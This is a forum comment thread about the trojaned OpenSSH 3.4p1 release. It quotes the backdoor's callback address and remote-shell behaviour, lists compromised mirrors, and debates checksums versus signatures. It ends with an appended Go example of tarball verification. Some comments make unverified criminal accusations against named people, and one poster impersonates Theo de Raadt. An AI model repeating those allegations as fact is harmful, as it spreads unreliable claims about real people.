Look at the gcc hack that inserted a backdoor into the Linux kernel, and there was NO source code in gcc to do so. It was a self-propagating gcc miscompile (put there on purpose). Kinda neat actually. I cannot seem to Google the link presently.
"One remote hole in default install, in nearly 6 years". Two if you install new ssh.
It seems if you rebuilt from source and rebooted within an hour, no time was spent on discovering how the cracker rooted the box in the first place.
If the cracker rooted openbsd.org through this box, then any evidence of the attack would have been wiped, wouldn't it?
Or is there still a chance on finding out who was behind this and how it happened? Firewall logs maybe?
Asshole Dickhead Men ?
I am afraid you are totally wrong, this could happen in open-source environments but also in closed development environments. The big difference is that in a closed-source project you do not even realise that you have been trojaned!!!
"At this moment I asked a couple of people on irc (#sage-au) if they have had troubles with compiling openssh the last days. Yups, ^Sarge^@bofh.snsonline.net also had it, also a checksum mismatch."
The trojan connects to 203.62.158.32, eh?
> nslookup 203.62.158.32
Server: dns2.intra
Address: 10.16.59.15
Name: snsonline.net
Address: 203.62.158.32
>
Chuck Norris: Socialism == a thousand years of darkness.
From freebsd-security mailing list. I am not sure this is for real or fake:
I just upgraded my OpenBSD 3.0 machine to OpenSSH 3.4 last night.
I downloaded openssh-3.4.tgz (notice not p1). The MD5 I got was
MD5 (openssh-3.4.tgz) = bda7c80825d9d9f35f17046ed90e1b0a
And look:
[root@superfrink /root/upgrades]# tar -tzf openssh-3.4.tgz | grep bf
ssh/ssh-keygen/bf-test.c
And then:
[root@superfrink /root/upgrades]# head -5 ssh/ssh-keygen/bf-test.c
/*
 * Blowfish input vectors are handled incorrectly on HP-UX PL.2 systems.
 * Perform routine compatability checks. */
#include
So I guess It's not just openssh-3.4p1.tar.gz that is trojaned.
/Chad
Never learn by your mistakes, if you do you may never dare to try again
Step 1: Read Ken Thompson's Turing Award lecture "On Trusting Trust"
http://www.acm.org/classics/sep95/
Step 2: Decide for yourself if you're ready for the tinfoil-helmet brigade.
Step 3: Type 'make world' if you dare.
...and don't trust the OpenSSL advisory sent out to Bugtraq by a "Ben Laurie". It's not signed, so I can't show that he wrote it. Apparently, it's trivially possible to get a trojaned tarball installed in mirrors everywhere, so that it is mirrored on "official" sources does not help. Is there any reason to believe the OpenSSL advisory other than its mention on their webpage (which could also be hacked as they're running Apache 1.3.6 which could have the chunked bug?)
:)
(this has turned in to quite the rant. sorry.
Sure security through obscurity is bad, but OpenBSD's method is worse.
OpenBSD's method of security through hype does nothing at all.
Well, except get a lot of people to order CDs for a mediocre UNIX clone and falsely believe they are secure...
Another more likely possibility would be that he was using passwordless authentication. So by rooting a box he has access to, the cracker could ssh to any other computer/user with his public key in the authorized_keys file. They could also scp the trojaned file in the same manner. This is not very unlikely.
-- john
I am afraid you are totally wrong, this could happen in open-source environments but also in closed development environments. The big difference is that in a closed-source project you do not even realise that you have been trojaned!!!
And how am I "totally wrong"? The timebomb I described *was* a closed-source project. Closed-source doesn't meant no-source, it merely means that the access to it is limited to some extent.
Knee-jerk reactions like yours don't help the 'cause' of Open Source development. Next time please take a deep breath and think about how your post will be interpreted before you send it. Thanks.
.f00Dave
We all know the security plan "Security through obscurity" it's not good.
But OpenBSD is based around a worse and less known plan: "security through hype".
Just keep screaming that it's the most secure and cover up any embarrassing security problems and people will just start to believe it.
It's what's known as the "big lie" tactic. Just say the lie enough times and eventually people will start to believe it. Seems stupid, but in history there are several examples of this working on a large scale. So why not use it to sell a bunch of CDs?
(OpenBSD is a for-profit organization, another little tidbit money-grubbing, hype-promoting Theo likes to keep under wraps.)
OpenBSD is security through hype.
The website says no hole in the "default" install in 6 years? Well it _must_ be secure then! Oooh hey look, Microsoft servers have a 99.999% uptime too! Oh what a wonderful world where the marketing hype rings true! Yippy!
OpenBSD is all about keeping up its image and feeding Theo's ego, that's about it.
Too many people are making assumptions. All we know is that the machine was wiped and reinstalled. He could have backed up a lot of relevant info before he wiped it. This would allow him to fix the computer, get it back up, and inspect the info later at his leisure.
i would wait until more information is available before jumping to what i would consider to be a silly conclusion.
-- john
Checking the md5sum just means the package matches the checksum. No good if the intruder updates the md5sum file. At least if there's an OpenPGP signature they have to compromise the private key first.
Gee, why would you want to do that? I thought everyone who broke into insecure systems was a good-natured Robin Hood, a "white hat" who was just trying to help the poor stupid admins out of the goodness of his or her heart.
:) *sorry, joke*
Enough sarcasm, this *was* malicious simply because this could have been a setup for a DDoS attack.
There's a big difference between breaking into a system then reporting the issue to the admin, and breaking into a system via a trojaned makefile/config only to gain root/user shell access for no other reason than to use them for some other purpose.
now you know the difference between black hat, and white hat.
of course then you have those individuals that make tools that encompass an entire OS, leaving the original interface a complete mystery to the user. These hackers are known as red hat
-- This space for lease, low setup fee, inquire within!
Alan Cox was calling Theo to task because he didn't like how Theo concealed the exact security problem until a workaround was given out. This is an attitude some developers have. It's not the best attitude from a customer/end-user standpoint, but some people who write code and give it away for free still don't understand it. Alan Cox sounds like, despite him being a valuable asset to the community, he does not understand this.
If he'd have said, "for all we know, OpenBSD could attract near-earth bodies" would you post this comment as "eerily prescient" on the recent asteroid stories? Sometimes things just aren't related. Despite what Mulder may think.
--
Internet Explorer (n): Another bug -- that is, a feature that can't be turned off -- in Windows.
The md5sums are not enough. Someone trustworthy[1] should sign the package and then make the public key available from various other trustworthy sources (three, at least).
Red Hat does this *right*:
http://www.redhat.com/solutions/security/news/publickey.html
Both the openssh and openssl people have to make pages like the one above. If such pages do exist, please pretty please post them here because I haven't seen them. Where are the "official" openssh and openssl public keys? They are not mentioned anywhere on either site's pages!
[1] The definition of "trustworthy" is not trivial. Personally, a public key found on both the Red Hat site *and* a box-wrapped CD qualifies. YMMV.
Also apt seems to have signed packages, but seems to be not widely used, as you can see here: http://www.kitenet.net/~joey/pkg-comp/#foot1
I downloaded the portable version of OpenSSH 3.4p1 pretty much as soon as it was released from ftp.openssh.com, and it's got the correct MD5 sum.
The timestamp on my copy of the openssh-3.4p1.tar.gz file is June 26th.
Anyone know when the trojan file was put in place?
All I can tell you is, let this be a lesson against using anything other than OpenBSD. At least we bother to look over our source code for security holes. We are still investigating exactly what led to the NetBSD machine being rooted, but we have a fair idea that it had something to do with the USB subsystem in the kernel. This is totally inexcusable. Just another reason to avoid that over-extended, slow, stinking pile of source code that is NetBSD. They oughta at least be grateful to me for finding this security hole for them, after all they've done to screw us over.
--
Theo DeRaadt
Founder, OpenBSD project.
This is the md5 checksum of the openssh-3.4p1.tar.gz in the FreeBSD ports system: ...
This is the md5 checksum of the trojaned openssh-3.4p1.tar.gz:...
And we know you're not the cracker, and we should believe you because ... oh, it's posted on /. so it must be true.
pr0n - keeping monitor glass spotless since 1981.
Do these titles bother anyone else? When I read "OpenSSH Package Trojaned" I feel a NEED to read up on it and figure out exactly where the trojan is and what might be affected. But then in the comments it says oh, its not really a trojan, just a hack. Can we please stop with these threats of terror, haven't we all had enough by now? And no we don't care how much it sells.
I don't think these bugs are symptoms of a systemic problem.
This trojan disturbs me a bit more than those bugs buried in thousands of lines of code. I guess I expect the OpenBSD guys to be good sysadmins, since, well, it just seems like something that should be their bag, baby. And maybe some will disagree with me, but I think that securely adminning a box is easier than writing secure code. (Maybe I'm just prejudiced because I'm a programmer. ;-)
If a trojan got onto OpenBSD's own FTP server, it means that somebody fucked up. Maybe they're not keeping their box up-to-date with the latest fixes. (And it looks like they're not "eating their own dog food," and eating Sun dog food instead. That is ridiculous.) Or maybe, worst of all, some black hat knows about a hole that nobody else knows about. I don't know; I just know I really don't like this. I hope they get on the ball, regarding their insecure server, muy pronto.
There is a good side to all this, though. I actually give money to OpenBSD (not a lot, but it's something) because I want somebody out there doing OS and OS-related stuff, to be over-the-top paranoid, and I think OpenBSD is the right team (I guess they've got the best slogans). I selfishly want more secure tools to get into circulation, so that I can be among those who use them. And from that perspective, this incident is a fscking godsend, because I think it might result in people starting to adopt some better habits, which will also require some better tools and social networks:
The solution to this trojan problem is not for people to start checking the MD5 sum on their tarballs. If you can't trust an FTP server to give you an unaltered file, then you can't trust a web server to give you a web page with an unaltered MD5 sum. Surely this is common sense?
The real solution is digital signatures (i.e. an MD5 sum encrypted with a private key). And for that to really work, we're going to have to build up a web of trust, so that people will know whether or not they really have a publisher's public key, or an imposter's. Maybe this will get us a little closer to the day when I can encrypt every email I send, and have to decrypt ever email I receive, except for the spam which gets thrown away automatically since it's the only thing that isn't signed by someone accountable.
It is hard to get people to use GPG. Real hard. Try convincing a friend (I mean a geeky friend; non-geeks are impossible) to use it, or try to organize a signing party sometime. I don't know why there's so much resistance and apathy, but it's there. We need all the help we can get, and today we got some.
As copyright owner of this comment, I authorize everyone to defeat any technological measure which limits access to it.
Hmm. An extremely easy-to-spot (read: dumb) trojan appears on the eve of DEF CON. The attackers had the wherewithal to get a compromised package onto the OpenBSD machines, but did so in a way that basically guaranteed it would be discovered quickly.
Doesn't this seem a little odd?
Looks like a play to discredit OpenBSD. Not to actually infect machines.
The server hosting the file was compromised somehow.
There was no code submission oversight, nor is there likely to ever be one.
I don't know when the trojan appeared exactly, but as one who uses Gentoo at both work and at home, I can attest to the following:
- Gentoo mirrors the source tarball at ibiblio and elsewhere, the current ssh being 3.4p1
- The MD5sum for the Gentoo ebuild is correct
- The mirrored tarball is also correct
- I've had no trouble installing the current openssh over the last several days
- I have personally verified the md5sums on each machine, not one of them contained the trojaned version, confirming that Gentoo's ebuild system did in fact correctly check the md5sum, had the correct md5sum, and had the correct source tarball.
We still need to have each ebuild, and IMHO each tarball, GPG signed by the appropriate developer, with separate third party trusted sources for the public keychain (and the ability to purchase the keychain on CD-ROM from trusted sources for the ultra-paranoid). I've been grousing about this off and on for over a year now (in Debian, later Source Mage, and now Gentoo, all of which need to address this. Maybe now they will.)
The Future of Human Evolution: Autonomy
Probably because they hope it won't raise much suspicion. Using 1337, 31337, etc would be like waving a flag.
If it'd be up to me, I'd use one of the less known ip protocols.
Check out http://www.openssh.org/txt/trojan.adv
The world doesn't need you.
It only shows how many people _who are interested in your packages_ check the md5/pgp key.
I don't think most servers, especially important and secure ones, run a mp3/ogg streamer. That would be home users, mostly. Joe 'admin' Sixpack. And well... 'nuff said.
as I do on my private Linux box, and you don't get this type of crap, nor the last security hole related to OpenSSH, which never did exist in the non-commercial SSH.com version which is free for all to use for non-profit(evaluation) purposes. It is freely available for download through SSH.com (source or binary I believe). One too many goofs with OpenSSH recently...as far as I'm concerned. Maybe I'm paranoid... but so what? So is everyone else.
'A lie if repeated often enough, becomes the truth.' - Goebbels
OpenSSH has had quite a few security flaws lately and this just hurts it more. ssh from ssh.fi is much better. No 2,000 dependencies, a much better security history, and it's all ssh2. OpenSSH is the new sendmail/wuftpd, but nobody wants to admit it.
I just rebuilt OpenSSH-portable yesterday on my FreeBSD box, finally getting around to addressing the newest vulnerabilities in 3.3.
I did a cvsup of the entire ports tree, then built OpenSSH-portable-3.4p1 as root. The build went fine; no MD5 checksum problems were reported. Did I get in just after the problem had been fixed, or am I screwed?
BTW, pkg_info now reports that I have openssh-portable-3.4p1 installed alongside openssh-portable-3.3 (the last version I built from ports). Is this a problem? If so, how do I fix it?
Schwab
Editor, A1-AAA AmeriCaptions
If you look at the parent author's posting history, you'll see that he is nothing more than a troll who fools people into thinking that he is Theo. (Incidentally, the name is "Theo de Raadt", not "Theo DeRaadt".)
Please mod the parent into oblivion.
Tarsnap: Online backups for the truly paranoid
repeat: norm, my ass.
you spelled your name wrong!
Slashdot : - : A load of shit monkeys who think they are professional experts because they were able get a slashdot account and use a string of words with letters longer than 7 characters in a sentence that sounds remotely coherent.
1.Usually found downloading pornographic material and spending all week downloading upgrades.
2.Rarely if ever contributes original ideas or projects. See (1); Too busy upgrading.
Hopefully, this has already been posted by the original emailer, but Tomi Nylund posted a list on the bugtraq list of affected servers.
"Anyways, we did some research here at Oulu regarding the propagation of the trojaned OpenSSH-3.4p1.tar.gz, and found out the following:
Trojaned mirrors:
3ac9bc346d736b4a51d676faa2a08a57 MD5(./ftp.club-internet.fr/pub/OpenBSD/OpenSSH/por
3ac9bc346d736b4a51d676faa2a08a57 MD5(./ftp.easynet.be/openssh/portable/openssh-3
3ac9bc346d736b4a51d676faa2a08a57 MD5(./ftp.freenet.de/pub/ftp.openbsd.org/pub/Op
3ac9bc346d736b4a51d676faa2a08a57 MD5(./ftp.fsn.hu/pub/OpenBSD/OpenSSH/portable/o
3ac9bc346d736b4a51d676faa2a08a57 MD5(./ftp.inet.no/pub/OpenBSD/OpenSSH/portable/
3ac9bc346d736b4a51d676faa2a08a57 MD5(./ftp.isu.net.sa/pub/mirrors/ftp.openbsd.or
3ac9bc346d736b4a51d676faa2a08a57 MD5(./ftp.jaquet.dk/pub/openSSH/portable/openssh-3
3ac9bc346d736b4a51d676faa2a08a57 MD5(./ftp.openbsd.cz/pub/OpenBSD/OpenSSH/portab
3ac9bc346d736b4a51d676faa2a08a57 MD5(./ftp.openbsd.org.br/pub/OpenBSD/OpenSSH/po
3ac9bc346d736b4a51d676faa2a08a57 MD5(./ftp.openbsd.ru/pub/OpenBSD/OpenSSH/portab
3ac9bc346d736b4a51d676faa2a08a57 MD5(./ftp.sajinet.com.pe/pub/OpenBSD/OpenSSH/po
3ac9bc346d736b4a51d676faa2a08a57 MD5(./ftp.stealth.net/pub/mirrors/ftp.openssh.c
3ac9bc346d736b4a51d676faa2a08a57 MD5(./ftp.tku.edu.tw/pub/OpenBSD/OpenSSH/portab
3ac9bc346d736b4a51d676faa2a08a57 MD5(./ftp.uninett.no/pub/OpenBSD/OpenSSH/portab
3ac9bc346d736b4a51d676faa2a08a57 MD5(./ftp.volftp.mondadori.com/mirror/openbsd/O
3ac9bc346d736b4a51d676faa2a08a57 MD5(./ftp7.usa.openbsd.org/pub/os/OpenBSD/OpenS
3ac9bc346d736b4a51d676faa2a08a57 MD5(./hal.csd.auth.gr/mirrors/OpenSSH/portable/
3ac9bc346d736b4a51d676faa2a08a57 MD5(./openbsd.csie.nctu.edu.tw/pub/OpenBSD/Open
3ac9bc346d736b4a51d676faa2a08a57 MD5(./openbsd.nsysu.edu.tw/pub/OpenBSD/OpenSSH/
3ac9bc346d736b4a51d676faa2a08a57 MD5(./openbsd.rug.ac.be/pub/OpenBSD/OpenSSH/por
"
forget it.
Seriously though, does anyone know how it happened yet? I have seen lots of talk about the trojan but nothing about how the trojan got there in the first place. This seems like it could be the tip of the iceberg.
turn-of-the-phrase Theo will spin this one with!
Open BSD - no exploits since the last full moon in an 'r' month'
> It compiles a daemon that tries to contact 203.62.158.32 on port 6667 and offers a remote shell for the user compiling the package. After that all files involved are removed and the makefile changed to the original one.
This sounds like a fairly conventional sort of debug hook. Connect back to the source archive where there are lots of debug and alpha-release goodies, let the installer download stuff, and compile it all into the binaries. Just what you'd want when you're developing stuff and want to make it easy to install on test machines.
I've also sometimes forgotten to remove the debug hooks.
Those who do study history are doomed to stand helplessly by while everyone else repeats it.
I respect OpenSource, I also appreciate spending money. Not to confuse the two, but, one wonders whether or not we should trust, to much, the whim of the written word on the net.
Are you really there, all of you, can you prove you exist and are not just some spamming, turing test/machine type thing?....
No, this is _not_ flamebait, just my 2 cents :-)
Is there a new "blackhat" 0day exploit circulating that never appeared on Bugtraq ?
This is the second time the obsd-team is being targeted by hackers unknown, the first time with an unexpected exploit in Apache with a follow-up 0wning of monkey.org and subsequent backdooring of the dsniff/fragrouter sources (which I'm sure everybody knows about by now), and now the OpenSSH sources get backdoored, and somebody in the obsd-team will vigorously defend their honor and will claim that some local exploit was used to gain access. C'mon, I'm sure these security-minded people will have their system secure...
History keeps repeating itself..
Bodø community site
It has been confirmed that the hacker group known as ADM was behind the trojanning of irssi, dsniff, and OpenSSH. You'll notice all trojans are very similar and that the latest contains the switch() cases of 'A', 'D', 'M'.
The ADM website is at http://ADM.freelsd.net/
They were responsible for creating the Anti-Security movement, which used to be accessible at http://anti.security.is. That movement promoted non-disclosure and encouraged hackers to send trojans to the security mailing lists and to backdoor distro site packages. You can see their FAQ archived here:
http://web.archive.org/web/20010702072841/anti.security.is/FAQ.php?faq=official
And you can see the recommendation to trojan distro site packages by following the link here:
http://web.archive.org/web/20010802063339/anti.security.is/links.php
("protect the bug foundation" was written by an ADM member and details how it is necessary to trojan packages to maintain a state of insecurity.)
K2, from the Honeynet Project, is a known member of ADM.
K2 works for CORE Security.
ADM is a subset of w00w00 Security Development (http://www.w00w00.org/)
DugSong (dsniff author, OpenBSD developer) is a member of w00w00 Security Development
DugSong said that his monkey.org machine was compromised by an EPIC client remote vulnerability, but despite protests from other groups, did not disclose any details of this remote vulnerability.
DugSong did not disclose any details of this vulnerability because he knows it was discovered by ADM, and although he is of reputable character, he did not want to aggravate ADM.
It's not a conspiracy theory. Anyone spending enough time on IRC and paying close attention can see the truth.
Running the latest versions of daemons means absolutely nothing when you're dealing with skilled exploit coders who most likely have a stash of unreleased exploits.
It's really time we stop ignoring the facades created by these so-called whitehat groups like w00w00. Individuals like K2 should stop being branded as security professionals and this criminal activity should be punished, rather than indifferently admired.
I am glad to hear that nerds are using protection during SSH. The fear of STDs is a major factor these days, especially with multiple partners.
SCO (noun.)- A Slimy Corporate Ogre. Often seeks free money.
Hooray for OSS!!!
I don't want to write a book here, so I'll keep this short...
It has been known for quite some time that the OpenBSD dev boxes (cvs/www.openbsd.org, etc) have been compromised. This incident didn't surprise me in the least.
I'm not trying to be a troll, but whenever you say your OS is "the most secure one available" or something of the like, you're going to become a target of blackhats (apache and openssh remote root).
I guess the bottom line is, don't become cocky about your security!
HAHAHAHHAHAHAHAHHAHA - the fags at zdnet didnt post this story. losers.
Work with me on this one.
The release is trojaned.
The first guy to be openly curious about it in the wild is Mav. Out of the tens of thousands that might have gotten it already.
Mav goes and seeks input from his mate Sarge.
Sarge just happens to be the owner of the box that is the callback for this trojan.
Mav posts to slashdot, giving some of the discovery credit to Sarge.
I am just asking, exactly how unlikely do the odds have to be before you got to accept that it is obviously something more than freak coincidence.
Nathan...
Does anyone have an idea whether the cygwin sshd is affected? 3.4p1 is the current version, and they may have built it based upon the trojaned source. I don't know where these guys get their source from.
GekkePrutser
It answers reverse DNS with "203.62.158.32".
An engineer who ran for Congress. http://herbrobinson.us
applejacks : a-puhl-jackz : A shitmonkey who thinks he is witty and insightful because he was able to get a slashdot account and use a string of words longer than 7 characters in a sentence that sounds remotely coherent.
1. Usually found staring at http://goatse.cx/hello.jpg and pounding his fat, sticky fingers on his keyboard to share "LOL"s with his fellow AOL lusers.
2. Rarely if ever contributes on-topic discussion. See (1); lacks a two-digit number of brain cells.
why now? this whole episode seems to be a good example of the current system working well... tarball trojaned, ports system detects md5 mismatch, no compromise, no problem.
Yes, and No.
Yes, in that it showed the strength of free software's openness with information, such that as soon as one person noticed something funny, the news got out and the trojan averted.
No, because in fact we just got really, really lucky. If the MD5sum hadn't been located on a different (uncompromised) server, the attacker(s) could have changed the MD5sum as well, and it might have been weeks, months, or longer before anyone noticed. My bet is on weeks, since someone would have poked at the code, but one can never be sure.
In other words, the current approach didn't really work, it just got lucky. MD5sums are great for identifying corrupt data or incomplete downloads, but they are neither designed for, nor good at, identifying hostile, deliberate sabotage.
GPG signatures, on the other hand, combine the strengths of MD5sums with the ability to immediately recognize a file that has been placed in an archive by someone other than the recognized, official developer, and would have prevented this entire thing regardless of where the signature is located (assuming the keys themselves are properly managed: available on multiple, independent keyservers, downloadable from multiple archive sites like ibiblio, etc., and available for purchase on CD-ROM for the ultra-paranoid).
The Future of Human Evolution: Autonomy
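Several posts in this thread make the same argument from different angles: a checksum published next to the tarball proves nothing once the server is owned, a checksum you already hold from somewhere else (the GnuNET-style "download a checksum, not a URL" idea) does catch a swapped file, and a detached signature catches it no matter where the tarball and signature came from, because the attacker lacks the maintainer's private key. The following Go program is an added worked example of those three regimes side by side; it is not code from OpenSSH, GnuNET, Gentoo or any poster. The "tarballs" are constructed byte strings standing in for openssh-3.4p1.tar.gz, SHA-256 stands in for MD5, and Ed25519 from the Go standard library stands in for the GPG signature; the mirror, key names and verdict names are all assumptions made up for the illustration.

```go
package main

import (
	"crypto/ed25519"
	"crypto/sha256"
	"encoding/hex"
	"fmt"
)

// Constructed stand-ins for a release tarball; not the real openssh-3.4p1.tar.gz.
var genuineTarball = []byte("openssh-3.4p1: genuine configure script and sources\n")
var trojanedTarball = []byte("openssh-3.4p1: configure now builds bf-test and phones home\n")

// Mirror is one download location: the tarball and the checksum file that sits
// beside it. Whoever can replace the first can replace the second.
type Mirror struct {
	Tarball []byte
	Sum     string // hex SHA-256 published on the same server
}

// Signed is a tarball together with the release manager's detached signature.
type Signed struct {
	Tarball []byte
	Sig     []byte
}

func digest(b []byte) string {
	s := sha256.Sum256(b)
	return hex.EncodeToString(s[:])
}

// CheckSameServerSum is what "compare against the md5sum on the web page" amounts
// to when the page and the tarball live on the same (compromised) host.
func CheckSameServerSum(m Mirror) bool {
	return digest(m.Tarball) == m.Sum
}

// CheckPinnedSum is content-addressed retrieval: the client already holds the
// expected digest, obtained somewhere the attacker does not control, and accepts
// a copy from any mirror or peer only if it hashes to that value.
func CheckPinnedSum(m Mirror, pinned string) bool {
	return digest(m.Tarball) == pinned
}

// Sign is the step the maintainer does once, with a key that never leaves their machine.
func Sign(priv ed25519.PrivateKey, tarball []byte) Signed {
	return Signed{Tarball: tarball, Sig: ed25519.Sign(priv, tarball)}
}

// CheckSignature needs only the maintainer's public key; where the tarball and
// the signature file were fetched from no longer matters.
func CheckSignature(pub ed25519.PublicKey, s Signed) bool {
	return ed25519.Verify(pub, s.Tarball, s.Sig)
}

// Verdicts records what each check says about a mirror the attacker owns.
type Verdicts struct {
	SameServerSumOnTrojan bool // passes: the attacker rewrote the checksum file too
	PinnedSumOnTrojan     bool // fails: the pinned digest was never on the mirror
	SignatureOnTrojan     bool // fails: no private key, so the old signature does not match
	SignatureOnGenuine    bool // passes: the verifier still accepts the real release
}

// Scenario plays out the attack: the attacker swaps the tarball, recomputes the
// checksum file, and can only leave the maintainer's original signature in place.
func Scenario() Verdicts {
	pub, priv, err := ed25519.GenerateKey(nil) // nil reader means crypto/rand
	if err != nil {
		panic(err)
	}
	release := Sign(priv, genuineTarball)
	pinned := digest(genuineTarball) // what a user carries in from a CD or keyserver

	evil := Mirror{Tarball: trojanedTarball, Sum: digest(trojanedTarball)}
	evilSigned := Signed{Tarball: trojanedTarball, Sig: release.Sig}

	return Verdicts{
		SameServerSumOnTrojan: CheckSameServerSum(evil),
		PinnedSumOnTrojan:     CheckPinnedSum(evil, pinned),
		SignatureOnTrojan:     CheckSignature(pub, evilSigned),
		SignatureOnGenuine:    CheckSignature(pub, release),
	}
}

func main() {
	v := Scenario()
	fmt.Printf("checksum from the same server:  %v (useless against this attacker)\n", v.SameServerSumOnTrojan)
	fmt.Printf("pinned/content-addressed sum:   %v\n", v.PinnedSumOnTrojan)
	fmt.Printf("signature on trojaned tarball:  %v\n", v.SignatureOnTrojan)
	fmt.Printf("signature on genuine tarball:   %v\n", v.SignatureOnGenuine)
}
```

The one thing the signature check does not solve on its own is the key-distribution problem the posts above keep returning to: `pub` has to reach the user over a path the attacker does not control, or the attacker simply publishes a fresh key and signs the trojaned tarball with it.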